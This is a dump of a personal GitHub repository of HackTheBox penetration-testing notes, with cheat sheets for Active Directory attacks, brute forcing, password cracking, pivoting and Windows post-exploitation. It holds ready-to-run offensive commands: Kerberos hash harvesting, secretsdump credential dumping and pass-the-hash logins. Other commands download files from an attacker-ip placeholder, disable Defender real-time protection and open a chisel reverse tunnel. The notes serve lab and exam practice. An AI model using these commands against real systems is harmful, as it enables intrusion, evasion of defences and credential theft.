[
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2020 Dhanesh Sivasamy\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "README.md",
    "content": "# hackthebox \n\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) \n![GitHub repo size](https://img.shields.io/github/repo-size/cyberwr3nch/hackthebox) <br />\n\n![GitHub Repo stars](https://img.shields.io/github/stars/cyberwr3nch/hackthebox?style=social)\n![GitHub forks](https://img.shields.io/github/forks/cyberwr3nch/hackthebox?style=social)\n![GitHub watchers](https://img.shields.io/github/watchers/cyberwr3nch/hackthebox?style=social)\n\n\nNotes Taken for HTB Machine<br />\nWill be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams<br />\nYet More to be updated<br />\n\ncreated & maintained by: **cyberwr3nch**\n\n# Contents\n- [Command Reference](https://github.com/cyberwr3nch/hackthebox/tree/master/notes)\n- [Tools](https://github.com/cyberwr3nch/hackthebox/tree/master/tools)\n- [Writeups](https://github.com/cyberwr3nch/writeups/tree/main/htb)\n\n#### SAY NO TO MSF !\n\n#### nvm this\nConstantly updating from *MAY 3<sup>rd</sup> 2020*\n\n# Thanks for visiting\nA noob _cyberwr3nch🔧_ \nA member of **TCSC** \nLearn and Spread <3 \n``` xoxo💙```\n\n\n### Support My contents\n<a href=\"https://www.buymeacoffee.com/cyberwr3nch\" target=\"_blank\"><img align=\"left\" alt=\"Dhanesh Sivasamy's Twitter\" width=\"120px\" src=\"https://cdn.buymeacoffee.com/buttons/v2/default-blue.png\"></a>\n\n\n"
  },
  {
    "path": "notes/Active Directory.md",
    "content": "## Active Directory \r\n### Machine workflow\r\n- [Tools](#too)\r\n- [Enumerate Ports and Shares](#enum)\r\n- [Identify valid users](#user)\r\n- [Obtain users has who have kerberos pre auth set](#gnp)\r\n- [Crack the hash to obtain the password](#cra)\r\n- [Repeat Recon](#rrpc)\r\n- [Enumerate other users in the network](#enumu)\r\n- [Remote login if hash is obtained](#pwn)\r\n\r\n### Required Tools <a name='too'></a>\r\n- [Impackets](https://github.com/SecureAuthCorp/impacket)\r\n- [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)\r\n- [Kerbrute](https://github.com/ropnop/kerbrute)\r\n- [Windsearch](https://github.com/ropnop/go-windapsearch)\r\n- [EvilWinRM](https://github.com/Hackplayers/evil-winrm)\r\n- [BloodHound.py](https://github.com/fox-it/BloodHound.py)\r\n\r\n### Enumeration Ports <a name=\"enum\"></a>\r\n```bash\r\n# nmap \r\nnmap -p- --min-rate=1000 -oN ports -vv <machine-ip>\r\n# sorting ports\r\nopen=$(cat ports | grep ^[0-9] | cut -d '/' -f1 | tr '\\n' ',' | sed s/,$//))\r\n# enumerate services\r\nnmap -sC -sV -p$open -oN nmap.out -T4 -vv <machine-ip>\r\n```\r\n\r\n### Anonymous Access\r\n```bash\r\n# crackmapexec\r\ncrackmapexec smb <machine-ip> -u'' -p'' <machine-ip> --shares\r\n\r\n# smbclient\r\nsmbclinet -N -L \\\\<machine-ip>\\\\\r\n\r\n#rpcclinet\r\nrpcclient -U '' -P'' <machine-ip> # logs into the network if anon login is permitted\r\nrpcclinet $> enumdomusers # enumerates the AD users\r\n```\r\n\r\n### Accessing a SMB Share\r\n```bash\r\n# smbclient\r\nsmbclient \\\\\\\\<machine-ip>\\\\<share-name>\r\n```\r\n\r\n### User Enumeration <a name='user'></a>\r\n\r\n- kerbrute\r\n\r\n```bash\r\n# no authentication is required, just the user name list\r\n# enumerate AD users with kerbrute\r\nkerbrute userenum --dc 10.10.*.* -d <domain-name> <username(s)>\r\n```\r\n\r\n### Mounting an open share\r\n\r\n```bash\r\n# mount an anonymous login share\r\nsudo mount -t cifs '//10.10.*.*/ShareName' 
/<mount-location>\r\n```\r\n\r\n### Kerberos Hacking <a name=\"gnp\"></a>\r\n```bash\r\n# after obtaining valid users, look for users with kerberos preauth set\r\nGetNPUsers.py -dc-ip <machine-ip> -format hashcat -usersfile <username(s)> <domain-name>/ -outputfile <hash-output>\r\n```\r\n\r\n### Obtaining Password <a name=\"cra\"></a>\r\n```bash\r\n# cracking with hashcat\r\n# TGT hash crack\r\nhashcat -m 18200 -w /usr/share/wordlists/rockyou.txt <hash-file>\r\n# SPN hash crack\r\nhashcat -m 13100 -w /usr/share/wordlists/rockyou.txt <hash-file>\r\n\r\n# cracking with JOHN THE RIPPER\r\n# TGT hash crack\r\njohn --format=krb5tgs -w=/usr/share/wordlists/rockyou.txt <hash-file>\r\n```\r\n\r\n### Recon as a user in network <a name='rrpc'></a>\r\n```bash\r\n# since we have the user credentials for a user in the AD network, recon again to obtain files with specific permissions\r\n\r\n# enumerate smb shares\r\ncrackmapexec smb <machine-ip> -u '<username>' -p '<password>'  --shares\r\n\r\n# accessing smb share\r\nsmbclient -L \\\\\\\\<machine-ip>\\\\<share-name> -U <username> <password>\r\n\r\n# mounting the share\r\nsudo mount -t cifs -o 'username=UserName,password=Password' '//10.10.*.*/ShareName' /<mount-location>\r\n\r\n# enumerate anything ¯\\_(ツ)_/¯ with windsearch \r\nwindsearch -d <domain-name> -u <user-name> -p <password> -m <module>\r\n```\r\n\r\n### Enumerate other users <a name=\"enumu\"></a>\r\n```bash\r\n# a valid login into the network is required\r\n# getadusers.py from impackets\r\nGetADUsers.py --all -dc-ip <machine-ip> <domain-name>/<username>:<password> # TGT will be obtained which can be cracked offline\r\n\r\n# enumerate service name principles\r\nGetUserSPNs.py -request -dc-ip <machine-ip> <domain-name>/<username>:<password> # SPN hash will be obtained which can be cracked offline\r\n\r\n# via rpcclient\r\nrpcclient -U <username> -P <password> <machine-ip> #logged into the network\r\nrpcclinet $> enumdomusers # enumerate users in the active directory 
environment\r\n\r\n# crackmapexec\r\ncrackmapexec smb <machine-ip> -u <username> -p <password> --users\r\n\r\n# windsearch \r\nwindsearch -d <domain-name> -u <user-name> -p <password> -m users\r\n```\r\n\r\n### Bloodhound Enumeration <a name='bh'></a>\r\n```bash\r\n# setup\r\ngit clone https://github.com/fox-it/BloodHound.py; cd BloodHound.py; python3 setup.py install\r\n\r\n# Running bloodhound.py (run on linux)\r\npython3 bloodhound.py -u <username> -p <password> -ns <machine-ip> -d <domain> -c all \r\n```\r\n```powershell\r\n# with sharpsploit\r\npowershell -ep bypass\r\nimport-module .\\SharpHound.ps1\r\ninvoke-bloodhound -collectionmethod all -domain <domain-name> -ldapuser <user-name> -ldappass <password>\r\n```\r\n\r\n```bash\r\n# start the neo4j console\r\nsudo ne04j console\r\n\r\n# start the bloodhound\r\ncd /opt/bloodhound-linux-x64/\r\n./BloodHound\r\n\r\n# import all the json files\r\n# mark the obtained user as owned user and the target user as high value target\r\n```\r\n\r\n### Owning the machine <a name='pwn'></a>\r\n```bash\r\n# perform bloodhound enumeration\r\n# if the access to the backup account is obtained,\r\nsecretsdump.py -dc-ip <machine-ip> -just-dc <domain-name>/backup:<password>@<domain-name>\r\n\r\n# login to the machine\r\n\r\n# psexec.py\r\n# with password\r\npsexec.py <domain-name>/<username>:<password>@<domain-namee>\r\n# with ntlm hash\r\npsexec.py -hashes <ntml:hashes> <username>@<domain-name> -target-ip <machine-ip> -dc-ip <machine-ip>\r\npsexec.py -hashes <ntlm:hashes> <username>@<machine-ip>\r\n\r\n\r\n# evilwinrm\r\n# with password\r\nevilwinrm -i <machine-ip> -u <username> -p <password>\r\n# with ntlm hash\r\nevilwinrm -i <machine-ip> -H <ntlm hash from secretsdump> -u <username>\r\n```\r\n\r\n### Misc\r\n\r\n#### Bruteforce\r\n##### Hydra\r\n```bash\r\n# bruteforcing smb login\r\nhydra -L users.txt -P pass.txt 10.10.*.* smb\r\n```\r\n##### Crackmapexec\r\n```bash\r\n# bruteforcing smb login, enumerating the available shares 
with --shares option\r\ncrackmapexec smb 10.10.*.* -u user.txt -p pass.txt --shares --continue-on-success\r\n\r\n# bruteforcing winrm login\r\ncrackmapexec winrm 10.10.*.* -u users.txt -p pass.txt --continue-on-success \r\n```\r\n##### Medusa\r\n```bash\r\n# bruteforcing smb login\r\nmedusa -h 10.10.*.* -U users.txt -P pass.txt -M smbnt \r\n```\r\n\r\n#### File Transfer\r\n##### SMB Service\r\n```bash\r\n# start a smb service in linux\r\n# anonymous share\r\nsmbserver.py <share-name> . -smb2support\r\n# authenticated share\r\nsmbserver.py <share-name> . -smb2support -username <username> -password <password>\r\n\r\n# connect to the smbshare in windows\r\n# anonymous share\r\nnet use x: \\\\<linux-ip>\\<share-name>\r\n# authenticated share\r\nnet use x: \\\\<linux-ip>\\<share-name> /u:<username> <password>\r\n\r\n# Copy file from windows to linux\r\ncopy <file-in-windows> \\\\<linux-ip>\\<share-name>\\\r\n# copy files from linux to windows\r\ncopy \\\\<linux-ip>\\<share-name>\\<file.ext> .\r\n\r\n```\r\n\r\n<<<<<<< HEAD\r\n##### Useful Links\r\n- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a\r\n- https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/\r\n- https://cheatsheet.haax.fr/windows-systems/exploitation/kerberos/\r\n- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet\r\n=======\r\n##### useful links\r\n- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a\r\n- https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/\r\n- https://cheatsheet.haax.fr/windows-systems/exploitation/kerberos/\r\n>>>>>>> dea41aa2b59fa497c70e9445f4c39b70a290ee5c\r\n"
  },
  {
    "path": "notes/Commands.md",
    "content": "# Commands\n\n- [Port Scanning](#ps)\n- [21 - FTP Port](#ftp)\n- [53 - DNS Port](#dns)\n- [139/445 - Samba/SMB](#smb)\n- [Directory Enumeration](#dir)\n- [Login BruteForce](#log)\n- [Sql Injection](#si)\n- [Active Directory](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Active%20Directory.md)\n- [File Transfer](#ft)\n\n### Port Scanning <a name='ps'></a>\n\n#### Tools Required\n\n- [Nmap](https://nmap.org/download.html)\n- [Rustscan](https://github.com/RustScan/RustScan/wiki/Installation-Guide#%EF%B8%8F-debian--kali)\n\n```bash\n# port scanning with nmap\n# full tcp port scan\nnmap -p- --min-rate=1000 -vv -Pn <machine-ip>\n# full udp port scan\nnmap -p- -sU -vv -Pn <machine-ip>\nnmap -p<enumerated-ports> -sC -sV -oN services.nmap <machine-ip>\n\n# rustscan\n# installation frorm above\nrustscan -a <machine-ip>\nnmap -p<enumerated-ports> -sC -sV -oN services.nmap <machine-ip>\n```\n\n### DNS Port <a name='dns'></a>\n\n#### Tools Require\n\n- [Dig](https://linuxhint.com/install_dig_debian_9/)\n\n```bash\n# reverse lookup\ndig -x <machine-ip> @<machine-ip>\n\n# zone transfer --> output: Subdomains\ndns axfr domain.tld @<machine-ip>\n```\n\n### FTP Port <a name='ftp'></a>\n\n#### Tools Required\n\n- FTP\n\n```bash\n# anonymous login\nftp <machine-ip>\n# username anonymous\n# password anonymous\n\n# downlaod files recursively without prompt\nbinary\nprompt off\nmget *\n```\n\n### Samba/SMB Port <a name='smb'></a>\n\n#### Tools Required\n\n- [Crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation)\n- SmbClient\n\n```bash\n# check the access of the shares\n# set user and password anonymous for anonymous checking\n# set user and password for a valid user to enumerate shares as network user\ncrackmapexec smb <machine-ip> -u user -p password --shares\n\n# access the share which you have permission to\nsmbclient //<machine-ip>/<share-name> -U user\n# password\n```\n\n### Directory Enumeration <a name='dir'></a>\n\n#### Tools 
Required\n\n- [Gobuster](https://github.com/OJ/gobuster/releases/tag/v3.1.0)\n- [DirSearch](https://github.com/maurosoria/dirsearch#Installation--Usage)\n- [rustbuster](https://github.com/phra/rustbuster/releases)\n- [ffuf](https://github.com/ffuf/ffuf)\n\n```bash\n# directory enumeration\n# wordlist = raft-medium-directories.txt\n## gobuster\ngobuster dir -u http://<machine-ip> -w wordlist -x php,html -b 404 -t 50 -o gobuster.out\n# rustbuster  \nrustbuster dir -u http://<machine-ip> -w wordlist -e php -S 404,403 -o rustbuster.out\n# dirsearch\npython3 dirsearch.py -u http://<machine-ip> -w wordlist\n# ffuf\nffuf -u http://<machine-ip>/FUZZ -w wordlist -fr 'not'\n\n# subdomain enumeration\n# wordlist = subdomains-top-11000.txt\n## gobuster\ngobuster vhost -w wordlist -u http://<machine-ip> -o gobuster-vhost.out\n## ffuf \nffuf -w wordlist -u http://<machine-ip>/ -H \"Host: FUZZ.domain.tld\" -mc 200\n```\n\n### Login Bruteforce <a name=\"log\"></a>\n\n#### Tools Required\n\n- [ffuf](https://github.com/ffuf/ffuf)\n- [Hydra](https://github.com/vanhauser-thc/thc-hydra#how-to-compile)\n\n```bash\n# wordlist = rockyou.txt\n# ffuf\nffuf -u http://<machine-ip>/login-page.php -X POST -d '{\"user\":\"FUZZ\", \"pass\":\"FUZZ\"}' -w wordlist\n\n# hydra\n# loginpage: /squirrelmail/src/login.php\n# payload sent during login: login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1 (provided username and password is replaced with ^USER^ & ^PASS^)\n# error message: Unknown\nhydra -l 'admin' -P wordlist <machine-ip> http-post-form '/{login-page}:{payload sent during login}:{error message}' -v\n```\n\n### SQLInjection <a name=\"si\"></a>\n\n#### Tools Required\n\n- [SqlMap](https://sqlmap.org/)\n\n```bash\n# capture the login request with burp and save it as login.req\nsqlmap -r login.req --level=5 --risk=3 --batch\n\n# manual expoitation\n> Capture the request with burp\n> The entered paramaters will be url encoded, decode it with <ctrl>+<shift>+<u>\n> Enter 
the payload \" ' or 1 = 1 -- - \" (simple sql injection payload)\n> After changing the payload, url encode it with <ctrl>+<u>\n```\n\n### File Transfer <a name=\"ft\"></a>\n\n#### Tools Required\n\n- [Python3](https://www.python.org/downloads/)\n- [Impackets](https://github.com/SecureAuthCorp/impacket#installing)\n\n```bash \n# between *nix os\n\n# on the attacker machine\npython3 -m http.server 8081\n\n# on the victim machine\nwget http://<attacker-ip>:<port>/<file>\ncurl http://<attacker-ip>:<port>/<file> -o <output-file>\n\n#===========================================================#\n\n# from linux to windows\n\n# on the attacker machine\n# creates a anonymous login\nsudo smbserver.py <share-name> <linux-path> -smb2support\n\n# on the victim machine\ncopy \\\\<attacker-ip>\\<share-name>\\<file> <copy-path-in-windows>\n# mount the share in windows\nnet use x: \\\\<attacker-ip>\\<share-name> /user:<user-name> <password>\ncopy x:\\<file> <copy-path-in-windows>\n\n# from external url\n# sometimes fails\npowershell -c (new-object System.Net.WebClient).DownloadFile('http://<attacker-ip>/<file>','<download-path-in-windows>')\n\n# works mostly\n#@alias\niwr -uri 'http://<attacker-ip>/<file>' -o '<download-path-in-windows>'\n#@cmdlet\npowershell.exe -command Invoke-WebRequest -Uri 'http://<attacker-ip>/<file>' -OutFile '<download-path-in-windows>'\n\n# using certutil\ncertutil -urlcache -f 'http://<attacker-ip>/<file>' '<download-path-in-windows>'\n```"
  },
  {
    "path": "notes/Docker Commands.md",
    "content": "# Docker Commands\n\n- Installation, scripts can be found [`here`](https://github.com/cyberwr3nch/hackthebox/tree/master/scripts/installation)\n\n- Building a docker file\n```bash\n# When a Dockerfile is found in a repository, build the docker image\ndocker build -t <tagname> .\n```\n\n- Downloading a docker file\n```bash\n# pull the latest version\ndocker pull <container name>\n# pull a specific version\ndocker pull <container name>:<verion>\n```\n\n- Running a docker\n```bash\n# listing the docker images \ndocker images \n\n# running the container\ndocker run -it <dockername>\n```\n\n- Removing the container\n```bash\n# list the images to find the image ID\ndocker rmi <imageID> -f\n```\n\n- List running docker instances\n```bash\ndocker ps\n```\n\n- Update the Docker when its contents have been altered\n```bash\ndocker update\n```\n\n- Run a docker with ports open\n```bash\ndocker run --rm -it -p <port on docker container>:<port on docker host> -p <port start>-<port end>:<port start>-<port end> <imageName>\n# single port \ndocker run --rm -it -p 21:21 <imageName>\n# continuous multiple ports\ndocker run --rm -it -p 21:21 -p 4559-4564:4559-4564 <imageName>\n```\n\n\n##### Resources:\n- Docker Chear Sheet by [wsargent](https://github.com/wsargent/docker-cheat-sheet/blob/master/README.md)\n"
  },
  {
    "path": "notes/Git Commands.md",
    "content": "# Git Commands\n\n- [Ctf / Inspection usage](#ctf)\n- [Normal / Dev usage](#dev)\n\n## CTF Usage <a name=\"ctf\"> </a>\n- Inspect a .git rep\n```bash\ngit status\n```\n\n- Identify the commit ids and the messages\n```bash\ngit log\n```\n\n- Get the commit ids and the messages ( without author name and date )\n```bash\ngit log --oneline\n```\n\n- Get the log information prettier ( added and deleted infomration )\n```bash\ngit log -p\n```\n\n- Get the log information prettier ( without author name and date information )\n```bash\ngit log --pretty=oneline\n```\n\n- Inspect a specific commit ID \n```bash\ngit log -p <commi ID>\n```\n\n- Checkout at a speicific commit ID ( retrive files at that specific commit )\n```bash\ngit checkout <commitID>\n# when error pops out use --force \ngit checkout --force <commitID>\n```\n\n- Restore the git to the specific version\n```bash\ngit reset --hard <commitID>\n```\n \n## Normal Usage <a name=\"dev\"></a>\n- Clone a repository\n```bash\ngit clone <repo link>\n```\n\n- Initialize the repository\n```bash\ngit init\n```\n\n- Update a repository\n```bash\ngit pull\n```\n\n- Add the copied files to the git\n```bash\ngit add .\n```\n\n- Commit a message\n```bash\ngit commit -m \"message\"\n```\n\n- Upload the git to github\n```bash\ngit push -u origin master --force\n```\n\n- Searching for deleted file/ the commit ID when deleting an object\n```bash\ngit log --diff-filter=D --summary\n```\n\n- Know the origin / url of a repository\n```bash\ngit config --get remote.origin.url\n```\n"
  },
  {
    "path": "notes/Password Cracking.md",
    "content": "### Password Cracking\r\n\r\n- hashcat \r\n- John\r\n\r\n```bash\r\n# get the mode of cracking with hashcat\r\nhashcat --example-hashes | grep -B4 'hash_starting'\r\n\r\n# crack the hashes with the specified mode\r\nhashcat -m xxxx hashes.txt /usr/share/wordlists/rockyou.txt\r\n\r\n# view the cracked password when hashcat is done cracking\r\nhashcat -m xxxx hashes.txt --show\r\n```\r\n\r\n```bash\r\n# crack hashes with John\r\njohn -w=/usr/share/wordlists/rockyou.txt hashes.txt\r\n```\r\n\r\n```bash\r\n# crack the password protected zip file\r\nzip2john \\<zipfile\\> \\> zipfile.hash\r\njohn  --format=zip zipfile.hash --wordlist=/usr/share/wordlists/rockyou.txt\r\n```\r\n"
  },
  {
    "path": "notes/Pivoting.md",
    "content": "### Network Pivoting\n\n<p align=\"center\">\n<img src=\"https://miro.medium.com/max/700/1*exRPwGYJpGv6eESldShwzQ.png\"/><br />\nImage from Vickie Li's <a href=\"https://medium.com/swlh/proxying-like-a-pro-cccdc177b081\">post</a></p>\n\n**Summary:**\n  - Network pivoting is the process of accessing an internal machine with the help of the compromised machine.\n  - Connection lies between the compromised machine and the internal machine, and no direct connection will be available from the attacker machine to the internal machine\n  - So in order to access the internal machine, we will make use of the compromised machine which has access to the internal machine\n\n**Dynamic Port Forwarding:**\n```bash\nDynamic Port Forwarding is the third major method of port redirection with SSH. \nWhere as previously both local and remote port forwarding allowed interaction with a single port, \ndynamic allows a full range of TCP communication across a range of ports. \nThe tool proxychains is also used to force any program you wish to use through the dynamic proxy.\n```\n\n**Requirements:** \n- To directly access the internal machine from the attacker machine, we can make the compromised machine as a proxy server and make all our requests to go via the compromised server to the internal machine\n- To perform this we need an `ssh / chisel service` and `proxychains` in attacker machine\n- If chisel is not available in the target machine, [chisel](https://github.com/jpillora/chisel/releases/tag/v1.7.4) release page\n\n**Procedure:**\n- Transfer the `chisel` binary to the compromised machine\n- On the Attacker machine:\n```bash\n# attacker IP: 192.168.1.1\n# syntax: ./chisel server -p {port} --reverse\n./chisel server -p 1337 --reverse\n```\n- On the compromised machine\n```bash\n# syntax: chisel client {attacker IP}:{port on chisel server} R:socks\n./chisel client 192.168.1.1:1337 R:socks # on a debian based machine\nchisel.exe client 192.168.1.1:1337 R:socks # on a 
windows machine\n```\n- On successful connection, the chisel server running on the attacker machine will pop the message\n```bash\n2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening\n```\n- The message implies that the connection is made via a socks proxy on the port `1080` which is a default proxy for the chisel\n- Add the following line in the `/etc/proxychains.conf`\n```bash\nsocks5 127.0.0.1 1080\n```\n- Now Whenever a command is executed in the attacker machine with mentioning the proxychains, \n```bash\nkali -> proxychains:1080 -> compromised_machine:1080 -> request for accessing from internal_machine -> internal_machine:80\n```\n\n<p align=\"center\">\n<img src=\"https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/Pivoting.jpg\"/> <br />\nImage by <a href=\"https://github.com/cyberwr3nch\">cyberwr3nch</a></p>\n\n\n**Syntax:**\n```bash\n# nmap port scan\nproxychains nmap -p22,80,8080,21,443,445 -sT internal_machinesIP\n\n# opening internal_machine webserver\nproxychains firefox internal_machinesIP:80\n```\n\n### Live Example\n- Machines used, bucket and Jewel from [htb](https://hackthebox.eu)\n\n<p align=\"center\">\n<img src=\"https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/pivoting-log.jpg\"/> <br />\nImage by <a href=\"https://github.com/cyberwr3nch\">cyberwr3nch</a></p>\n\n- Summary of the pivot\n\n<p align=\"center\">\n<img src=\"https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/pivot-summary.jpg\"/> <br />\nImage by <a href=\"https://github.com/cyberwr3nch\">cyberwr3nch</a></p>\n\n<h5>Thanks <a href=\"https://github.com/adithyan-ak\">@adithyan-ak</a> for binding me in</h5>\n"
  },
  {
    "path": "notes/PostExploitationCommands.md",
    "content": "### Command Reference\r\n| Description | Unix | CMD | Powershell |\r\n| -- | -- | -- | -- |\r\n| User Logged in | whoami | echo %username% | $env:username|\r\n| | | | [System.Security.Principal.WindowsIdentity]::GetCurrent().Name |\r\n| Change Directory | cd \\<path\\> | cd \\<path\\> | Set-Location \\<path\\> |\r\n| Lis the directory | ls | dir | Get-ChildItem |\r\n| View file contents | cat \\<file\\> | type \\<file\\> | Get-Content \\<file\\> |\r\n| Move files | mv \\<file.org\\> \\<file.mov\\> | move \\<file.org\\> \\<file.mov\\> | Move-Item \\<file.org\\> \\<file.mov\\> |\r\n| Clear Screen | clear | cls | Clear-Host |\r\n| Copy files | cp \\<file.org\\> \\<file.cpy\\> | copy \\<file.org\\> \\<file.cpy\\> | Copy-Item \\<file.org\\> \\<file.cpy\\> | \r\n| Delete files | rm \\<file\\> | del \\<file\\> | Remove-Item \\<file\\>|\r\n| Web Requests | curl \\<url\\> | | Invoke-WebRequest \\<url\\> |\r\n| Supress Error messages | cd /Windows32/System 2>/dev/null | cat /etc/shadow 2>nul | Get-Content /etc/passwd -ErrorAction SilentlyContinue |\r\n\r\n### Network monitoring\r\n\r\n```bash\r\n# network modules info and IPs\r\nifconfig\r\nipaddr\r\n# shows the tcp connection\r\nnetstat -antp     \r\nss -antp  \r\n#netstat -ano ; 0.0.0.0:445 = implies, SMB service is running within the machine and not open for others\r\n#so it is best to perform port forwading and checking those services locally\r\n# windows\r\nnetstat -antp \r\nipconfig        \r\n```\r\n\r\n### Windows Post Exploit\r\n### Powershell \r\n![powershell](https://github.com/cyberwr3nch/hackthebox/blob/master/scripts/files/powershell.png)\r\n#### Get to know the current user, which you are logged in \r\n\r\n```powershell\r\n# system_name\\user_name\r\n[System.Security.Principal.WindowsIdentity]::GetCurrent().Name\r\n\r\n# user name & system name\r\n$env:UserName\r\n$env:UserDomain\r\n\r\n# find exe's in the current directory\r\n# -erroraction 'silentlycontinue' similar to 
2>/dev/null\r\nGet-ChildItem -Filter \"*.exe\" -Recurse -erroraction 'silentlycontinue' \r\n```\r\n\r\n#### Disable RealTimeProtection\r\n\r\n```powershell\r\n#disables real time protection\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\n\r\n#enables real time protection\r\nSet-MpPreference -DisableRealtimeMonitoring $false\r\n```\r\n\r\n### CMD Commands\r\n\r\n#### Normal CMD\r\n\r\n```powershell\r\n# get current username\r\nwhoami\r\n\r\n# get system information\r\nsysteminfo\r\n\r\n# wget for windows\r\ncertutil -urlcache -f http://iamserver:port/xxxx.exe xxxx.exe\r\n\r\n# grep() for os name\r\nsysteminfo | findstr /C:\"OS Name\"\r\n\r\n# locate() for files\r\nfindstr /si password *.txt *.ini *.config *.xml *.bat\r\n\r\n# locate *.exe's\r\ndir /s /b *.exe\r\nwhere *.exe\r\n\r\n# get the hostname\r\nhostname\r\n\r\n# know the priviledges we have\r\n# token impresonate attacks can be donw with this privs\r\nwhoami /priv\r\n\r\n# know all the users in the machine\r\nnet user \r\n\r\n# Obtain information about the specific user\r\nnet user <username>\r\n\r\n# Obtain users belongs to a specific groups\r\n# users belonging to the sudo groups\r\nnet localgroup administrators / <group name>\r\n\r\n# get to know network\r\nipconfig\r\nipconfig /all\r\n\r\n# internal network services\r\nnetstat -ano \r\n\r\n# get to know antivirus\r\nsc query windefend\t#know about windows defender status (up / down)\r\nsc queryex type= service #brings all the running services in the machine\r\n\r\n# get to know about the firewall \r\nnetsh show firewall state\r\n\r\n# Search for passwords in registry\r\nreg query HKLM /f password /t REG_SZ /s\r\n\r\n# port forward using plink.exe -l user -pw password for the user \r\nplink -l root -pw <pass> -R PORT:127.0.0.1:PORT 10.10.x.x\r\n\r\n# search for binaries in the machine, like whereis in linux\r\n# rn searching for powershell.exe in C:\\Window\\System32\r\nwhere /R C:\\windows\\System32 powershell.exe\r\n\r\n# look for stored 
credentials in the machine\r\ncmdkey /list \r\n\r\n# run as commands, when the creds for the user is stored which can be confirmed with cmdkey /list\r\nrunas.exe /user:domain\\UserName /savecred \"C:\\Windows\\System32\\cmd.exe /c Type C:\\Users\\UserName\\Desktop\\(user|root).txt > C:\\Users\\lowUser\\root.txt\"\r\n\r\n# if SeImpersonate Priviledges is available, use Printspoof\r\n# https://github.com/itm4n/PrintSpoofer\r\nPrintSpoofer.exe -i -c cmd\r\n```\r\n\r\n#### CMD commands when wmic is available\r\n\r\n```powershell\r\n# updation list\r\nwmic qfc get Caption,Description,HotFixID,InstalledOn\r\n\r\n# list disks with wmic\r\nwmic logicaldisk get caption,description,providenBane\r\n\r\n```\r\n\r\n#### When Port forwarding:\r\n\r\n- In the linux machine\r\n\r\n```bash\r\n# check ssh installation\r\nsudo apt install ssh\r\n# for a normal user, the ssh login will be smooth \r\n# for a root user, edit the sshd.config\r\n# change from #PermitRootLogin prohibit-password -> PermitRootLogin yes\r\nvi /etc/ssh/sshd_config\r\n# start the ssh service\r\nsudo service ssh start\r\n# check the port forwarded service\r\nnetstat -ano\r\n# after forwading the port, if user creds are available try winexe, 127.0.0.1 is given since the particular port is forwarded to out local machine\r\nwinexe -U Administrator%<pass> //127.0.0.1 \"cmd.exe\"\r\n\r\n```\r\n\r\n#### Resource\r\n\r\n##### \\*.exe\r\n\r\n- [winPEAS.exe](\"https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS\")\r\n- [Seatbelt.exe](\"https://github.com/GhostPack/Seatbelt\")\r\n- [Watson.exe](\"https://github.com/rasta-mouse/Watson\")\r\n- [SharpUp.exe](\"https://github.com/GhostPack/SharpUp\")\r\n\r\n##### \\*.ps1\r\n\r\n- [Sherlock.ps1](\"https://github.com/rasta-mouse/Sherlock\")\r\n- [PowerUp.ps1](\"https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp\")\r\n- [Jaws-enum.ps1](\"https://github.com/411Hall/JAWS\")\r\n- 
[PowerUp.ps1](\"https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1\")\r\n\r\n##### Misc\r\n\r\n- [Windows-exploit-suggester.py](\"https://github.com/AonCyberLabs/Windows-Exploit-Suggester\")\r\n- [Windows-Kernal-exploits](\"https://github.com/SecWiki/windows-kernal-exploits\")\r\n- [CVE's](\"https://github.com/nomi-sec/PoC-in-GitHub\")\r\n- [winexe](\"https://tools.kali.org/maintaining-access/winexe\")\r\n- [PsExec](\"https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py\")\r\n- [SmbExec](\"https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\")\r\n- [WmiExec](\"https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py\")\r\n- [Impersonate PrivEsc](\"https://github.com/gtworek/Priv2Admin\")\r\n"
  },
  {
    "path": "notes/README.md",
